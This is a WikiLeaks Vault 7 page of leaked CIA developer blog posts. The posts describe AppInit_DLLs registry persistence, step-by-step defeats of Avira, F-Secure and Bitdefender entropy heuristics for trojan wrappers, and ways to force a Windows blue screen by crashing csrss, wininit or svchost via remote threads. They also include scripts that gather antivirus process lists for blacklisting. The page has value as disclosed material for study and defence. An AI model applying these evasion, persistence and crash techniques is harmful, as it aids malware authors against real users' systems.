Thursday, June 1, 2017

AppInit_DLLs regkey == Cheap persistence technique that isn't a Run key? (link - https://wikileaks.org/ciav7p1/cms/space_3276809.html)

Vault 7: CIA Hacking Tools Revealed

Navigation: » Directory

Owner: User #71473

User #71473

PagesDateUser
HammerDrill SECRET

Attachments:


Blog posts:

  • [User #71473]: Huh. It works.
    So, that whole
    [BLOGPOST] content-title="AppInit_DLLs regkey == Cheap persistence technique that isn't a Run key?" posting-day="2016/02/18"
    thing I posted a little while ago?  Just tested it on Windows 10.  It works.
    On Windows 10 (and, apparently, Windows 7 and up), there's a second value in the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows that needs to be set in addition to AppInit_DLLs -- LoadAppInit_DLLs. This is a REG_DWORD, and setting it to 1 enables the loading of the DLLs specified in the other value.  Oh, by the way, the list of DLLs in the AppInit_DLLs is space or comma delimited – I was expecting semicolon delimited, but MSDN says otherwise.
    Speaking of MSDN, a page entitled "AppInit_DLLs in Windows 7 and Server 2008 R2" has some interesting tidbits that seemed to indicate a move towards requiring code signing of the DLLs somewhere in the future.  Specifically, they mention a 3rd value, RequireSignedAppInit_DLLs, that when set to 1 says only signed DLLs will be loaded.  They go on to say that for compatability purposes, Windows 7 shipped with this disabled, while Server 2008 shipped with this enabled.  Flip forward all the way to Windows 10 (over 7 years later), and this value isn't even defined by default.  I think maybe I'll write something that checks for these values and run it against the DART VMs to see what happened to that key across versions.

    Slight Tangent:
    I found some vague hints that the RequireSignedAppInit_DLLs might not even do anything on Windows 10 and that unsigned DLLs work regardless of how that is set.  However, SecureBoot apparently does block the DLLs from loading, so maybe they have moved away from a specific code signing check for this key and are relying on secure boot being enabled.  (Incidentally, these hints came from a thread of people hacking Windows 8, 8.1 and 10 to use the Aero window style from Vista/Win 7.  They appear to be using the AppInit key to get their DLLs loaded into every process, which in turn causes the GUI apps to use old style controls to render their windows.  This amuses me)

    Happy reg hacking!

    #getoffMyLawn #pleaseWindowsLoadTheseDLLsISwearTheyAreNotMalware
  • [User #71473]: Weird little behavior in Windows
    This is a silly observation, but it amused me, so I will share.
    If you map a network drive (say, U:\) and then try to copy a file from the mapped share to a location on your local system that requires admin creds to access, the copy will fail complaining it can't access U:\
    This is (most likely) because your mappings are not shared between your admin and non-admin tokens.  Type net use into a normal command prompt and then do the same in an elevated command prompt to witness the awful truth.
    If you *really* want those shares to show up for both tokens, you can map them from the elevated command prompt.
    net use U: \\fs-01\home /PERSISTENT:YES
    This should make it so that you have your U: drive when you are running as admin.

    Happy share mapping

    #getOffMyLawn #splitTokensHaveSomeInterestingSideEffects
  • [User #71473]: AppInit_DLLs regkey == Cheap persistence technique that isn't a Run key?
    I was poking around the web trying to figure out why a DLL I was memloading into a process would sometimes crash when creating a Window.  I found some interesting things when delving down that rabbit hole, including a post by User #76981 that seemed to describe the kind of bad behavior I was seeing related to leaking a Window Class.  He kept referencing windows created with the CS_GLOBALCLASS window style, which makes your window class available to all modules in the current process.  I wasn't using this style, but curiosity about how it worked led me to MSDN, where I read the following:
    "To create a class that can be used in every process, create the window class in a .dll and load the .dll into every process.  To load the .dll in every process, add its name to the AppInit_DLLs value in the following registry key:

    HKEY
    _LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows

    Now, I don't know about you, but I'd never heard of this key before.  I'm curious – has anyone seen this used for persistence before, is it something that PSPs freak out about, and are there any gotchas to using this?  If nobody knows, at some point I'll write up some proof of concept code and give it a whirl to see if a) it works and b) the PSPs give it any grief.
    If nothing else, if it turns out it kinda sucks, but there are at least some cruddy PSPs that let it slide, it might be viable for Liaison tools that need something that isn't what we use in unilateral stuff.
  • [User #71473]: The Bug that isn't, except when it is (MSDN Lies)
    I ran into a bug in some post processor code that only manifested on Windows 7, but not Windows 8+.  This was... odd. 
    The post processor code in question is very, very simple, and works reliably on Windows 10, where I did all of my original testing and debugging.  On Windows 7, the code crashes consistently, but after processing the first chunk of data.  Usually, OS incompatibility is a bit more all or nothing – if you use a feature that isn't present on an older OS without dynamically loading the function, you crash immediately, not 2 pages of code later at the bottom of the main processing loop.
    So I fired up Visual Studio on a Win 7 VM and stepped into the code.  The offending line is this:
    WriteFile(writeFile, uBuff.m_pBufferAddr, writeSize, 0, NULL);
    When I finally looked closely at the line (and not just at the first few parameters), I recognized a classic rookie mistake – the "optional" lpNumberOfBytesWritten parameter is only optional when lpOverlapped is not NULL.  I've read that text in MSDN dozens of times and corrected this bug in new developer's code dozens more.  How did I miss this?  More importantly, how did this work in Windows 8+?  This code should always crash – WriteFile sets *lpNumberOfBytesWritten = 0 at the beginning of the function.
    It appears Microsoft has altered the behavior of WriteFile.  For good or for ill, this optional parameter appears to now be truly optional, not just conditionally optional.  The MSDN docs, however, do not reflect this change in behavior.
    tl;dr – this works now, but don't do this or it will break backwards compatibility

  • [User #71473]: Entropy-based Heuristics in PSPs (and how to defeat them)
    I mentioned in a
    [BLOGPOST] content-title="A Few Observations on Cryptography, Compression and Randomness" posting-day="2015/06/09"
     the basic theory behind information entropy and how it is used by some PSPs to heuristically flag binaries as Trojans.  Today I'll go into the PSPs with which I have personally bashed heads over this type of detection, how we defeated or worked around the issue, and then some general techniques to try to identify entropy-based heuristics and attempt to evade them.
    The first PSP where we (OSB) encountered entropy-based checks was Avira.  A large portion of our work at the time (2010-2012) consisted of QRCs to develop Trojans and installation wrappers for other tools and implants.  When trojaning an overt binary with a malicious payload, our most common techniques all revolved around compressing and encrypting an overt and covert binary into a wrapper that was built as a look-alike of the overt program in terms of size, icons, timestamps, etc.  Doing this typically results in a very small installer binary (75K or less was common) that is then packed with two or more other binaries that are typically much larger.  The result is a binary that has a very high proportion (75% or more, typically) of compressed and encrypted data – data that is, of course, high entropy.  The high entropy data was usually stored in one of 3 places: the .rsrc section (Raptor), the .data section (Melomy) or appended to the end of the binary (Ferret).
    Once the payloads were packed into the binary, Avira routinely caught the tools and would pop a box with reference to some variant of a Trojan.Win32 heuristic signature.  One of the senior OSB developers at the time noted that self-extracting archives were very similar in their nature to the types of Trojans we produced, yet were never flagged as malicious by Avira.  Armed with this observation, the dev attempted to mimic a RAR self extractor in various ways and eventually discovered that including the RAR signature ("RAR!" or hex 52 41 52 21) and a small amount of random data anywhere in the compiled binary was enough to defeat Avira's heuristic detection.
    We later unexpectedly ran afoul of Avira again with a tool written by User #4849738 when we was a co-op in RDB.  The tool in question was a network survey tool that didn't contain any payloads but was still tripping a Trojan.Win32 heuristic signature.  Even stranger, the tool did not flag when it was built with OpenSSL for its encryption library rather than the Microsoft Crypto API.  The most noticeable difference between the two versions was the filesize of the binary – when built with the MSCrypto library the binary was roughly 80K, while the OpenSSL version was around 300K.  I was helping investigate the issue when I ran a simple visualization tool against the binaries and discovered that both had significant areas in their data sections that contained high entropy data, but that the areas were identical.  I realized that these were likely cryptographic constants (S-boxes, most likely) that were shared by the libraries due to being defined in the underlying algorithms.  The only difference was that the proportion of high entropy data in the MSCrypto version of the tool was much higher thanks to the smaller file size – the constants were 12K out of ~80K, or ~15%.  By contrast, the 12K constants were less than 4% of the OpenSSL binary.  I began experimenting by padding the MSCrypto library with different amounts of data until Avira stopped flagging the binary, and found that Avira seemed to be tripping the signature at the 5% User #76980.  Unlike previous detections, this was clearly a false positive, as the tool was in no way a Trojan.  We also discovered that by not linking against crypt32.lib but instead loading crypt32.dll at run time, we could avoid having those crypto constants directly linked into the code.
    It became standard practice to include the RAR! defeat in our Trojans, so much so that we included a function in most of our builders that would automagically add the defeat after packing the payloads into the wrapper.  Avira Entropy Defeat includes the source code for AddAviraDefeat().  We later discovered that F-Secure was also triggering on high-entropy binaries but was unfortunately immune to the RAR! defeat.  Instead, resource cloning of a self extracting RAR string table proved effective.  Unfortunately, the string table defeat cause Avira to flag binaries even when they contained the RAR! defeat.  We discovered that cloning the manifest of a RAR SFX binary defeated both PSPs simultaneously.  F-Secure Entropy Defeat details the manifest that needs to be included.
    The final annoying entropy-based detection we ran into was Bitdefender.  Bitdefender only flagged high entropy resources, so Ferret's and Melomy's seemed to be immune.  Fortunately, Bitdefender's heuristic was rather lame in that it completely ignored resources that were not RC_DATA.  Bitdefender Resource Defeat  details the rather simple defeat.
    Based on these experiences, there's a set of tasks that you can use to triage a Trojan.Win32 type detection to see if you are running afoul of an entropy based heuristic:
    1. Scan the binary without including the payloads.
    2. If the scan passes, include the payloads with no compression or encryption
    3. If the scan passes, then you have likely run afoul of entropy based-checks
    Things to try if you are confident you are being caught due to entropy
    • Pad the binary with a large amount of low-entropy dummy data (zero padding works well but is suspicious looking.  Low-color bitmaps work well and actually add some cover)
    • If storing the data as a resource, change the resource type
    • Change how the data is stored – move compiled in payloads to a resource and vice versa
    • Use obfuscation instead of encryption/compression
    • Encode the encrypted data (base-64, hex, URL-encode, etc.) to lower the entropy
    • Store the data in an external file (resource only DLL, .dat file)
    Happy PSP Evasion! 

  • [User #71473]: PSP Process Lists have been updated
    Clicketh PSP Process Names from DART to findeth yon lists.
  • [User #71473]: New PSP Process Lists from DART are available
    You can find the current list PSP Process Names from DART 
    Also, a shameless plug for my blog post on entropy and its use by PSPs as a (terribad) heuristic
    [BLOGPOST] content-title="A Few Observations on Cryptography, Compression and Randomness" posting-day="2015/06/09"
  • [User #71473]: A Few Observations on Cryptography, Compression and Randomness
    For folks working in clandestine software, Cryptography is a critical piece of our tradecraft.  Proper application of cryptographic techniques is critical to protecting the data at rest, data in transit and the tools themselves.  Cryptography can be a double edged sword when it comes to PSP evasion – hiding certain portions of your code with cryptographic techniques may allow you to evade detection, but some PSPs will actually flag your tool simply for "looking encrypted".  In addition, the crypto code in your tool is often one of the most signaturable aspects of the tool – most block ciphers have large blocks of constant binary data (particularly s-boxes) that can be used to quickly identify not only the presence of cryptographic code but also the specific algorithm being used.  Add in the various nuances in how different implementations chooses to represent that data and you can get a fairly specific signature that can often be hard to minimize.
    Knowing that PSPs are wary of crypto to varying degrees and with varying levels of sophistication, there are some useful things in the field of information theory to be aware of when trying to obfuscate cryptographic code and encrypted data.  The following concepts are key to understanding how a PSP or malware analyst goes about looking for your crypto.

    Entropy (Shannon Entropy)
    "In Information Theory, entropy is the expected value of the information contained in each message received.  Here, message stands for an event, sample or character drawn from a distribution or data stream." – Wikipedia entry "Entropy (intofmation theory).
    The above quote may seem like a bit of a headscratcher at first.  What exactly is the "expected value of the information"?  In Information Theory, the value of information is determined by how likely (or rather, how unlikely) a given event is to occur.  If The value of an event is extremely predictable because there are few values to choose from or the distribution of values is highly skewed, then each event has very low information. 
    Entropy is expressed in terms of bits of entropy – the maximum number of bits of entropy for a given data sample is based on the number of bits necessary to represent all possible values.  For byte values, the maximum possible entropy is 8, as it takes 8 bits to represent all 256 possible values.  Calculating entropy is relatively straightforward:

    float getEntropy(unsigned char *data, unsigned int dataSize) {   float entropy = 0.0;  unsigned int counts[256] = { 0 };    for (int i = 0; i < dataSize; i++)  {   counts[data[i]]++;  }    float p = 0.0;  for (int i = 0; i < 256; i++)  {   if (counts[i] != 0)   {    p = ((float)counts[i] / (float)dataSize);    if (p > 0)    {    entropy = entropy - p * (log(p) / log(2.0));    }   }  }    return entropy; } 

    It is important to understand that entropy is a measure of how well distributed a sample space is.  A file containing every possible value in exactly the same proportion will have perfect entropy.  Entropy is *not* a measure of randomness and in and of itself it is a poor test for randomness, although random data will have high (but not perfect) entropy.  Compressed data is high entropy because compression algorithms strive to make every bit of information meaningful by eliminating redundancy and reducing values to the fewest number of bits necessary to represent them.  In fact, some compression algorithms use entropy as part of their procedures for encoding data.
    Entropy is used by some PSPs as a heuristic to determine if a binary has been trojaned.  Avira has been observed to flag binaries that contain "large" amounts of high entropy data – somewhere between 5-10% of the binary.  This happens to be a horrendous heuristic when it comes to false positives, and as a result, Avira also has some logic that allows "known good" binaries a pass (i.e., self extracting RAR files).  Similar entropy based heuristics have been observed with F-Secure and Bitdefender as well.
    Bear in mind that if you encrypt or compress data within a binary, you are likely to run afoul of an entropy based-heuristic.  How likely this is to happen depends on how large the encrypted/compressed section is relative to the overall size of the binary.   For small binaries, highly entropic constants used in encryption libraries can be enough to trip these heuristics – Avira once flagged a collection tool with no encrypted data simply because of two large sections of high entropy data statically linked into the binary when linked with standard windows crypto libraries that contained cryptographic constants.
    Avoiding heuristics like these will depend on the individual PSP.  Due to the high likelihood of false positives, many PSPs have checks on other aspects of the files (resources, magic numbers) to determine if they appear to be legitimate high entropy binaries such as self extractors.  Avira looks for the RAR! magic number to identify self extracting RAR files, while F-Secure looks for string table entries in the resource section that are commonly associated with the self extractor portion of a RAR self extractor.  Avoiding heuristics such as these generically can also be accomplished by encoding the data (hex, base-64, etc.) or "greening" the data (encoding the data in such a way as to make the entropy match that of a target data sample.)
    There are better statistical tests for determining randomness than entropy.  I'll talk about a few in a future post.  Stay tuned!



  • [User #71473]: Culling PSP Process Names via the Power of DART, Part 2.
    Back in March, I posted about some work I was doing to automatically gather a list of PSP processes by diffing a list of baseline process against a dynamically generated process list across multiple DART VMs.  I recently finished up refining things a bit more so that a test plan can be run that gathers PSP process lists from all available Windows VMs on DART.  The goal is to be able to run this periodically, post process the data into a nice format and then populate the various PSP pages with process lists so that we have reasonably up-to-date information on processes to blacklist against.
    The script is now setup to dump its output into the resources folder with a filename generated from the VM attributes.  This gives us a single folder on dart-ts-01 we can collect the data from for processing.

    import tybase.undermine.leaf as leaf import tybase.undermine.meta.leafi as leafi _tasklist_path = 'c:\\windows\\system32\\tasklist.exe /NH /FO CSV' _baseline_path = 'media/SimpleTest/resources/baseline.txt' _output_path = 'media/SimpleTest/resources/' @leafi.MainLeaf() @leafi.DefineProcessor() class UnitTest(leaf.Leaf):     def run(self):         self.log.info( 'started' )         diff = lambda l1, l2: [x for x in l1 if x not in l2]         baseline_file = open(_baseline_path, "r")         baselineText = baseline_file.read()         baselineText = baselineText.upper()         baseline_file.close()         baselineList = baselineText.split('\n')         for h in self.hosts:             if not h.service_ping():                 return self.FAILURE, 'failure'             os_name = get_details_string(h.host)             outputFileName = _output_path + 'Results_' + os_name             outputFile = open(outputFileName, "w")             os_info = get_details(h.host)             outputFile.write("OS Family: %s\r\n" % os_info['family'])             outputFile.write("OS Type:   %s\r\n" % os_info['os'])             outputFile.write("OS SP:     %s\r\n" % os_info['ossp'])             outputFile.write("OS Lang:   %s\r\n" % os_info['lang'])             outputFile.write("OS Arch:   %s\r\n" % os_info['arch'])             outputFile.write("PSP:       %s\r\n" % os_info['apps'])             outputFile.write("---------------------------------\r\n")             tasks = h.execcmd( _tasklist_path, wait=True, shell=True )             lines = tasks.split('\n')             procNames = []             for line in lines:                 fields = line.split(',')                 name = fields[0]                 name = name.upper()                 procNames.append(name)             myDiff = diff(procNames, baselineList)             #myDiff = diff(baselineList, procNames)             myDiff = list(set(myDiff))             for name in myDiff:                 if (name != '\r'):                     outputFile.write("%s\r\n" % name)             outputFile.write("\r\n\r\n")             outputFile.close()         return self.SUCCESS, 'success'   def get_details(host_ip):     import json     import os     cmd = './media/tyworkflow/bin/db_admin -j list_resources ' \           'with_header=True filter_by=ip="%s" select=family,os,ossp,lang,arch,apps' % host_ip     x = os.popen(cmd)     data = x.read()     x.close()     data_list = json.loads(data)     my_dict = dict(zip(data_list[0], data_list[1]))     if my_dict['apps'] in [ '-', '', 'adobe', 'adobereader' ]:         my_dict['apps'] = 'nopsp'     return my_dict   def get_details_string(host_ip):     my_dict = get_details(host_ip)     return_string = '%s_%s_%s_%s_%s_%s' % (my_dict['family'],                                            my_dict['os'],                                            my_dict['ossp'],                                            my_dict['lang'],                                            my_dict['arch'],                                            my_dict['apps'])     return return_string  

    The baseline.txt file is a work in progress but is being updated as additional non-psp processes are discovered in the results.


  • [User #71473]: So you wanna make windows BSOD from user space? (Observations On Taking Down Critical Windows Processes Part II)
    SECRET//NOFORN

    I talked about this a bit back in
    [BLOGPOST] content-title="Observations On Taking Down Critical Windows Processes" posting-day="2015/02/12"
    , but I'd like to revisit this with additional info.
    I develop on Windows.  You might think I hate BSODs.  But this is not true... I love BSODs.  BSODs make me chuckle, especially when I cause them to happen.  Even more so when I cause them to happen deliberately.  Unfortunately, there are vanishingly few requirements where BSODs are desirable.  In fact, BSODing a system is generally frowned upon in this establishment.
    So my little pet project (yay, iTime!) to terminate processes by any means necessary didn't seem like it was likely to be usable in any real tool.  However, I have since had two possible we're-not-kidding-this-is-for-realz opportunities to use this stuff.  The first scenario is that you may be running a tool that is messing with a user's software (say, something recording from the webcam).  We have a project like this in OSB for a PAG customer that is all kinds of awesome.  For most cases, the tool can suspend the recording software, corrupt data, and then resume the process once the PAG officers have beat feet.  Unfortunately, one of the common webcam monitoring applications that PAG runs across is a little unstable and the developers deliver it with a watchdog process that restarts the software if it appears to go non-responsive.  We could, of course, suspend the watchdog process too, but this puts application specific behavior into a tool that is supposed to be application agnostic.
    I recommended a solution that is basically a bigger, more aggressive watchdog – it watches for new, non-SYSTEM process to startup (I allow anything in the NTAUTHORITY group to start for good measure) and immediately kills them.  It was awesome.  It also, surprisingly, was able to kill 32-bit processes from a 64-bit process using CreateRemoteThread, which I didn't think was actually possible.  So here we have a process basically acting all Gandalf on the system and going "You Shall Not Pass!".  Plenty cool and stuff – might get used, might not, but its ready to go if the dev decides there isn't a more elegant solution.
    The same tool previously had an optional bluescreen capability as a way of taking the box down without an obvious shutdown.  However, that capability used a driver (custom driver in 32-bit, signed 64-bit driver from a 3rd party app with an exploitable call for 64-bit).  Unfortunately, there's a bit of an on-disk signature there since the driver requires a service installed to fire it up, if only long enough to bluescreen.  The problem is, of course, its hard to clean up that registry residue when the box is, ya know, off.  So the dev for the new version was all like "Hey man, is there a way to blue screen from user mode?" and I was all like "Totally!"  I even had code that could do it with a bit of tweaking.  Bro is all "Sweet, I just Bluescreened my Win 7 box" and I was all "Hot diggedy smack!  Hey, you want me to figure out which processes to trash for other flavors of Windows?"
    So this is the result of my research into taking down various flavors of Windows:
    • Windows XP 32-bit: Crash csrss.exe
    • Windows 7 64-bit: Crash wininit.exe or csrss.exe
    • Windows 8 32-bit: Crash csrss.exesmss.exe or wininit.exe
    • Windows 8.1 64-bit: Crash csrss.exe or wininit.exe
    • Windows 10 64-bit: See below
    So, as you can see, most versions of Windows tested share csrss.exe as the common process that can immediately BSOD the box.  wininit.exe doesn't exist on XP.  smss.exe can be opened on XP, but I haven't been able to crash it yet.  Windows 10... is special.
    On Windows 10, you cannot even open the majority of SYSTEM process.  wininit.exe, smss.exe and csrss.exe are all untouchable.  However, you can open and terminate or crash all svchost.exe processes.  Doing this repeatedly for long enough eventually gets you the coveted 0xc000021a stop code that seems to mean the kernel is so flabbergasted at all the carnage on the system that it has abandoned all hope and marched itself directly to the underworld.  This takes roughly 30 seconds or so and about 3-4 rounds of automatic restarts of svchost.exe processes.
    Further testing is needed for server OSes as well as Vista and Win 7 32-bit, but it looks like we have full coverage across the various flavors if we just target csrss.exe and, if that fails, a massive assault on all things svchost-y.
    Note: Crashing these processes was done in one of two ways: Calling an API function with a bogus pointer value (0xFFFFFFFF and its 64-bit analog seem to work nicely) via CreateRemoteThread or injecting code to divide by zero.  Both seem to work equally well.  APIs that seems to crash nicely are printf_s from msvcrt, CharUpperA from user32, LoadLibraryA from kernel32.

    #dieWindows10YouGravySuckingPigDog
    #killItWithFire
    #youShallNotPass

    SECRET//NOFORN
  • [User #71473]: Culling PSP Process Names via the Power of DART
    When rolling out some hair on fire QRC, we occasionally run into issues with blacklisting PSPs due to variances in process names on various OS versions, OS bitnesses, PSP bitnesses, and even "flavor" of the PSP (i.e., Enterprise, Antivirus, Internet Security and Free vs. Pay editions).  There was at one time a mythical table of PSP process names that I believe we originally got from IV&V, but over time things change and what was once comprehensive is now dated, incomplete and even outright incorrect.
    With DART, we have a pretty wide breadth of PSPs that get updated routinely, so it should be easy to automatically cull a list of process names across multiple OS/PSP combos.  I have the beginnings of a DART script that will collect a process The end goal is to setup a Bamboo build that will run the test plan periodically.
    The basic script looks like so...
      import tybase.undermine.leaf as leaf import tybase.undermine.meta.leafi as leafi   #Location of the baseline text file -- this is an evolving list of processes that are normally or #at least frequently found running on DART VMs that are non-PSP related _baseline_path = 'leafbags/SimpleTest/simple_tests/baseline.txt'   #Path and command line switches to tasklist executable on the target VM -- for ease of parsing we want no header and a CSV formatted list _tasklist_path = 'c:\\windows\\system32\\tasklist.exe /NH /FO CSV'   @leafi.MainLeaf() @leafi.DefineProcessor() class UnitTest(leaf.Leaf):     def run(self):         self.log.info( 'started' ) #diff two lists with a single line lambda -- yes, it's voodoo magic         diff = lambda l1, l2: [x for x in l1 if x not in l2]   #get and parse the baseline file as a list         baseline_file = open(_baseline_path, "r")         baselineText = baseline_file.read()         baseline_file.close()         baselineList = baselineText.split('\n')   #make sure we are able to connect to the host then grab and diff the tasklist         for h in self.hosts:             if not h.service_ping():                 return self.FAILURE, 'failure'             tasks = h.execcmd( _tasklist_path, wait=True, shell=True )             lines = tasks.split('\n')             procNames = []             for line in lines: #separate the CSV line into fields                 fields = line.split(',') #we just want the name, which is the first field                 procNames.append(fields[0]) #this produces a list that only contains names not found in the baselineList             myDiff = diff(procNames, baselineList)             print myDiff         return self.SUCCESS, 'success'  

    The baseline list for a Win7 64 VM looks like so:
    "System Idle Process" "System" "smss.exe" "wininit.exe" "csrss.exe" "winlogon.exe" "services.exe" "lsass.exe" "lsm.exe" "svchost.exe" "spoolsv.exe" "pythonw.exe" "vmtoolsd.exe" "taskhost.exe" "sppsvc.exe" "dllhost.exe" "msdtc.exe" "dwm.exe" "explorer.exe" "pythonw.exe" "SearchIndexer.exe" "slui.exe" "WmiPrvSE.exe" "cmd.exe" "conhost.exe" "tasklist.exe" "wmpnetwk.exe" "dinotify.exe" "wuauclt.exe" "taskmgr.exe" "WMIADAP.exe" "SearchProtocolHost.exe" "SearchFilterHost.exe" "VSSVC.exe"

    Stay tuned for when I actually get this working with a test plan


  • [User #71473]: Timing Issues and DART
    I've spent quite a bit of time debugging unit tests recently where everything seemed to be working just fine until I started running the UnitTests via DART.  While I found legitimate bugs in both the tests and the units under test via DART thanks to the coverage across multiple OSes, I also found lots of sporadic failures that I was unable to reproduce when reserving the same VM and running the test directly.  Multiple runs of the same test plan produced failures in different tests on different VMs.  Non-reproducible errors are bad.
    When I run into errors like this, I always suspect timing issues (race conditions in particular) and my old-school, inelegant technique for testing this suspicion is to throw some big old sleeps into the code and see if things magically fix themselves.  In my particular case, I was testing Payload Deployment components that started additional processes and/or threads and Privilege Escalation/UAC Bypass techniques that do the same under the covers.  My suspicion was that there was a tiny delay between starting these new processes and threads and the results of these threads actually being produced. 
    In some cases, the components in question return thread handles or other waitable objects.  I added Waits as appropriate and some of the issues went away.  However, I occasionally ran into issues where the threads were taking significantly longer to finish than I expected.  What I thought was a healthy 10 second timeout on the wait call was sometimes insufficient, so I had to up these timeouts.  Additionally, since some of the components in question can't make thread handles or other waitable objects available to the caller, I was forced to introduce Sleeps to try to mitigate remaining timing issues.
    One thing to note is that the DART hardware is pretty busy these days.  Running dozens of VMs concurrently can slow individual VMs to a crawl, and sometimes tests that should take a matter of seconds can take minutes.  I erred on the side of caution with my Sleeps and Waits, allowing timeouts of up to 4 minutes on WaitForSingleObject calls and introducing Sleeps of up to 30 seconds in areas of the code where noticeable delays were expected.  Still, it is worth noting that the current resource constraints of the DART hardware can be a blessing in disguise, as it is much easier to find timing issues when there is a large pool of potentially quite slow VMs to bang against.
    One other thing to note: I have observed on local VMs that machines that have VMware tools installed that occasionally the vmtoolsd.exe process will sometimes run away with an entire core of the CPU.  This condition coincides with copy/paste and drag-and-drop breaking between the host and guest.  If your VM is setup to run with a single virtual CPU, this can make timing issues popup with alarming regularity.
    The moral of the story:  If your failures seem unpredictable, look at timing issues.  Just because things work fine on your multi-core dev box doesn't mean they will work in a slow VM or on an ancient target laptop.  As a professor of mine repeatedly said "This code works 99.99% of the time.  You may never actually see it fail, but its still wrong."
  • [User #71473]: Observations On Taking Down Critical Windows Processes
    When working on unit tests for thePayload Deployment Library SECRETlibrary, I was running into issues killing some of my spawned child processes when they were run as SYSTEM.  Killing things nicely by sending WM_CLOSE messages to all of the processes windows and then calling TerminateProcess if the app was still up worked fine when running as an ordinary user, but as SYSTEM, nothing seemed to be working.  I suspect my process token was missing a privilege (even though I had granted myself PROCESS_TERMINATE, I read somewhere that might not be enough for SYSTEM).  At some point I will probably look at fixing the token so TerminateProcess does work, but the documentation for TerminateProcess has always seemed... unsettling. 

    The TerminateProcess function is used to unconditionally cause a process to exit. The state of global data maintained by dynamic-link libraries (DLLs) may be compromised if TerminateProcess is used rather than ExitProcess.

    That sounds like it could be bad... although I'm not entirely sure what the ramifications are in real usage.  MSDN has more scary warnings on the subject under "Terminating a Process (Windows)"

    Do not terminate a process unless its threads are in known states. If a thread is waiting on a kernel object, it will not be terminated until the wait has completed. This can cause the application to stop responding.
    ...
    If a process is terminated by TerminateProcess, all threads of the process are terminated immediately with no chance to run additional code. This means that the thread does not execute code in termination handler blocks. In addition, no attached DLLs are notified that the process is detaching. If you need to have one process terminate another process, the following steps provide a better solution:
    ...blah, blah, blah, use a private windows message, blah, blah, sample code, blah, blah, blah...

    Because of the failure to terminate behavior and the scary MSDN commentary, I decided to look for other alternatives to TerminateProcess.  MSDN's recommendations are a non-starter; they assume that the process I am trying to kill is something I am developing and suggest a private window message.  While that works fine for a process I developed myself, its useless for arbitrary processes that I just need to go away.  Contemplation and online research convinced me that, given MSDN's clear preference for ExitProcess as the "clean" way to terminate, forcing the target process to call ExitProcess was the way to go.  I wrote a simple ExitRemoteProcess function that takes a process handle and an arbitrary exit code and did some experimenting on various processes to see how they behaved.  I didn't deliberately setout to hose the system horribly, I just wanted to see what would happen.
    What I found was interesting.  Most usermode processes went down cleanly, but some refused to die quietly and hung around undisturbed.  SYSTEM processes were generally even more resilient, as only a few (winlogon and wdm) actually terminated from ExitProcess.  Killing wdm isn't so bad... at least not on its own.  Killing winlogon is super annoying since it takes all of the current user's processes with it... and possibly any other logged in users as well.  But killing a couple SYSTEM processes wasn't enough.
    A more effective but potentially messier solution was to cause a deliberate access violation in the target process – we do this by using CreateRemoteThread to pass a bogus pointer value to a function that takes a pointer value as its first argument.  Most well behaved API functions nowadays check for a NULL pointer, but they certainly don't check for 0xFEEDFACEDEADBEEF, now do they?  I targeted the problematic processes with this technique and many more of them went down.  Some process I could not open at all with whatever standard permissions SYSTEM receives when running via psexec – csrss.exe and smss.exe were notably resistant to my attempts to open them.  Other processes were surprisingly less resilient:
    • Wininit can be crashed and doing so leads to an instant bluescreen with stop code 0x000000ef (CRITICAL_PROCESS_DIED).  Too easy...
    • Killing lsass.exe leads to a popup and automatic shutdown after a 1 minute delay.  At least you still have time to save your work, I guess...
    • Several processes that restart themselves (notably WUDFHost.exe and svchost.exe) will eventually stop respawning if killed repeatedly in a tight loop. 
    • Crashing wdm.exe in a tight loop (2000 ms sleep or smaller between attempts to crash) is non-fatal but horribly annoying to the user.  The screen flickers between the desktop and a blank screen, and although the interface remains quasi-usable (you can still click things), the repeated crashes of wdm.exe destabilize and eventually crash winlogon.exe, taking all other user processes with it
      .  The more mouse/keyboard activity while in the loop, the more frequent the winlogon crashes, but even an unattended machine will still occasionally crash out to the login screen.
    • Crashing numerous restarting system processes such as WUDFHost.exe and svchost.exe seems to destabilize the system and frequently results in a bluescreen with Stop code 0xc000021a (STATUS_SYSTEM_PROCESS_TERMINATED).  The description of this stop code on answers.microsoft.com is amusing:
    This error occurs when a user-mode subsystem, such as WinLogon or the Client Server Run-Time Subsystem (CSRSS) has been fatally compromised and security can no longer be guaranteed.  In response, the operating system switches to kernel mode.  Microsoft Windows cannot run without WinLogon or CSRSS.  Therefore, this is one of the few cases where the failure of a user-mode service can shut down the system.
    Interestingly, neither WinLogon nor CSRSS were touched when the 0xc000021a bluescreens were shown – but somehow we managed to "fatally compromise them" such that "security can no longer be guaranteed."  ROFL

    #killItWithFire
    #lolWindows
    #moreLikeWinDiesAmirite?
    #getOffMyLawn
  • [User #71473]: When Windows Lies...
    I've been working on fixing some code in the PayloadDeployment library related to the task schedule: Create Process And Choose A User To Run As Via The Task Scheduler (TaskSchedulerRun_SPKL - Speckled) SECRET  The existing code was using the GetStatus() method of the ITask interface to try to determine if the task had started, but this was returning an error related to the fact that the task was not defined to have a trigger (its intended to be run one time only using the Run() method and then deleted).  I went in and added a legitimate daily trigger starting in 1999 to see if the code would then work, but then repeatedly got SCHED_S_TASK_HAS_NOT_RUN.  I was staring at the task that just, in fact, ran in the Task Schedule UI and found myself scratching my head.  Surely there must be some way to determine that the task that just ran and dropped a file on my desktop actually, ya know, ran.
    I ploughed through the ITask interface and found GetExitCode() and GetMostRecentRunTime(), thinking that since both of these values were staring at me from the UI they must surely be available via the API.  Sadly, both also returned SCHED_S_TASK_HAS_NOT_RUN and filled in their Out parameters with 0 values.
    Thinking that maybe if the task was run via the schedule and not directly via Run() we might get meaningful values, I tried creating the trigger to run one minute from now.  I saw the task run on the appointed minute, but once again, nothing but SCHED_S_TASK_HAS_NOT_RUN
    Unless someone out there has some insight into why the API fails to return any meaningful data while the UI returns copious details about the totally-not-failing-to-run task, than I am forced to assume that lying Windows is a filthy liar... and may wind up just parsing the output from schtasks.exe to see if my task ran.

